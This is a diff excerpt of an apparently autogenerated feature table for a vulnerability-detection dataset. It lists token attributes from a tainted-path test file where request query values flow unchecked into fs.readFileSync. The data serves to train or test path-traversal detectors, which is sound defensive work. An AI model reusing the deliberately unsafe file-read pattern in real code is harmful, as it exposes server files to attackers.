autogenerated/TaintedPath/TaintedPath.js:142:24:142:26 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:142:24:142:30 | req.url | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/TaintedPath.js:142:24:142:30 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:142:24:142:30 | req.url | calleeImports | url | @@ -5819,6 +62945,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:142:24:142:30 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:142:24:142:30 | req.url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:142:24:142:30 | req.url | receiverName | url | +| autogenerated/TaintedPath/TaintedPath.js:142:28:142:30 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:28:142:30 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:28:142:30 | url | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:142:28:142:30 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:142:28:142:30 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:142:33:142:36 | true | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/TaintedPath.js:142:33:142:36 | true | InputArgumentIndex | 1 | | autogenerated/TaintedPath/TaintedPath.js:142:33:142:36 | true | calleeImports | url | @@ -5828,6 +62959,41 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:142:33:142:36 | true | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:142:33:142:36 | true | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:142:33:142:36 | true | receiverName | url | +| autogenerated/TaintedPath/TaintedPath.js:142:39:142:43 | query | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:39:142:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:39:142:43 | query | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:142:39:142:43 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:142:39:142:43 | query | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:142:45:142:48 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:45:142:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:45:142:48 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:142:45:142:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:142:45:142:48 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:144:3:144:4 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:144:3:144:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:144:3:144:4 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:144:3:144:4 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:144:3:144:4 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:144:3:144:17 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:144:3:144:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:144:3:144:17 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:144:3:144:17 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:144:3:144:17 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:144:3:144:23 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:144:3:144:23 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:144:3:144:23 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:144:3:144:23 | exceptional return of fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:144:3:144:23 | exceptional return of fs.read ... c(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:144:3:144:23 | fs.read ... c(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:144:3:144:23 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:144:3:144:23 | fs.read ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:144:3:144:23 | fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:144:3:144:23 | fs.read ... c(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:144:6:144:17 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:144:6:144:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:144:6:144:17 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:144:6:144:17 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:144:6:144:17 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:144:19:144:22 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:144:19:144:22 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:144:19:144:22 | path | calleeImports | fs | @@ -5837,6 +63003,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:144:19:144:22 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:144:19:144:22 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:144:19:144:22 | path | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:146:7:146:11 | split | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:146:7:146:11 | split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:146:7:146:11 | split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:146:7:146:11 | split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:146:7:146:11 | split | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:146:7:146:29 | split | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:146:7:146:29 | split | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:146:7:146:29 | split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:146:7:146:29 | split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:146:7:146:29 | split | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:146:7:146:29 | split = ... it("/") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:146:7:146:29 | split = ... it("/") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:146:7:146:29 | split = ... it("/") | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:146:7:146:29 | split = ... it("/") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:146:7:146:29 | split = ... it("/") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:146:15:146:18 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:146:15:146:18 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:146:15:146:18 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:146:15:146:18 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:146:15:146:18 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:146:15:146:24 | path.split | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:146:15:146:24 | path.split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:146:15:146:24 | path.split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:146:15:146:24 | path.split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:146:15:146:24 | path.split | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:146:15:146:29 | exceptional return of path.split("/") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:146:15:146:29 | exceptional return of path.split("/") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:146:15:146:29 | exceptional return of path.split("/") | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:146:15:146:29 | exceptional return of path.split("/") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:146:15:146:29 | exceptional return of path.split("/") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:146:15:146:29 | path.split("/") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:146:15:146:29 | path.split("/") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:146:15:146:29 | path.split("/") | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:146:15:146:29 | path.split("/") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:146:15:146:29 | path.split("/") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:146:20:146:24 | split | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:146:20:146:24 | split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:146:20:146:24 | split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:146:20:146:24 | split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:146:20:146:24 | split | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:146:26:146:28 | "/" | CalleeFlexibleAccessPath | path.split | | autogenerated/TaintedPath/TaintedPath.js:146:26:146:28 | "/" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:146:26:146:28 | "/" | calleeImports | url | @@ -5846,6 +63052,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:146:26:146:28 | "/" | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:146:26:146:28 | "/" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:146:26:146:28 | "/" | receiverName | path | +| autogenerated/TaintedPath/TaintedPath.js:148:3:148:4 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:148:3:148:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:148:3:148:4 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:148:3:148:4 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:148:3:148:4 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:148:3:148:17 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:148:3:148:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:148:3:148:17 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:148:3:148:17 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:148:3:148:17 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:148:3:148:34 | exceptional return of fs.read ... n("/")) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:148:3:148:34 | exceptional return of fs.read ... n("/")) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:148:3:148:34 | exceptional return of fs.read ... n("/")) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:148:3:148:34 | exceptional return of fs.read ... n("/")) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:148:3:148:34 | exceptional return of fs.read ... n("/")) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:148:3:148:34 | fs.read ... n("/")) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:148:3:148:34 | fs.read ... n("/")) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:148:3:148:34 | fs.read ... n("/")) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:148:3:148:34 | fs.read ... n("/")) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:148:3:148:34 | fs.read ... n("/")) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:148:6:148:17 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:148:6:148:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:148:6:148:17 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:148:6:148:17 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:148:6:148:17 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:148:19:148:23 | split | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:148:19:148:23 | split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:148:19:148:23 | split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:148:19:148:23 | split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:148:19:148:23 | split | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:148:19:148:28 | split.join | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:148:19:148:28 | split.join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:148:19:148:28 | split.join | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:148:19:148:28 | split.join | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:148:19:148:28 | split.join | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:148:19:148:33 | exceptional return of split.join("/") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:148:19:148:33 | exceptional return of split.join("/") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:148:19:148:33 | exceptional return of split.join("/") | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:148:19:148:33 | exceptional return of split.join("/") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:148:19:148:33 | exceptional return of split.join("/") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:148:19:148:33 | split.join("/") | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:148:19:148:33 | split.join("/") | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:148:19:148:33 | split.join("/") | calleeImports | fs | @@ -5855,6 +63101,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:148:19:148:33 | split.join("/") | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:148:19:148:33 | split.join("/") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:148:19:148:33 | split.join("/") | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:148:25:148:28 | join | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:148:25:148:28 | join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:148:25:148:28 | join | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:148:25:148:28 | join | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:148:25:148:28 | join | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:148:30:148:32 | "/" | CalleeFlexibleAccessPath | split.join | | autogenerated/TaintedPath/TaintedPath.js:148:30:148:32 | "/" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:148:30:148:32 | "/" | calleeImports | url | @@ -5864,6 +63115,37 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:148:30:148:32 | "/" | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:148:30:148:32 | "/" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:148:30:148:32 | "/" | receiverName | split | +| autogenerated/TaintedPath/TaintedPath.js:150:3:150:4 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:150:3:150:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:150:3:150:4 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:150:3:150:4 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:150:3:150:4 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:150:3:150:17 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:150:3:150:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:150:3:150:17 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:150:3:150:17 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:150:3:150:17 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:150:3:150:51 | exceptional return of fs.read ... h - 1]) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:150:3:150:51 | exceptional return of fs.read ... h - 1]) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:150:3:150:51 | exceptional return of fs.read ... h - 1]) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:150:3:150:51 | exceptional return of fs.read ... h - 1]) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:150:3:150:51 | exceptional return of fs.read ... h - 1]) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:150:3:150:51 | fs.read ... h - 1]) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:150:3:150:51 | fs.read ... h - 1]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:150:3:150:51 | fs.read ... h - 1]) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix 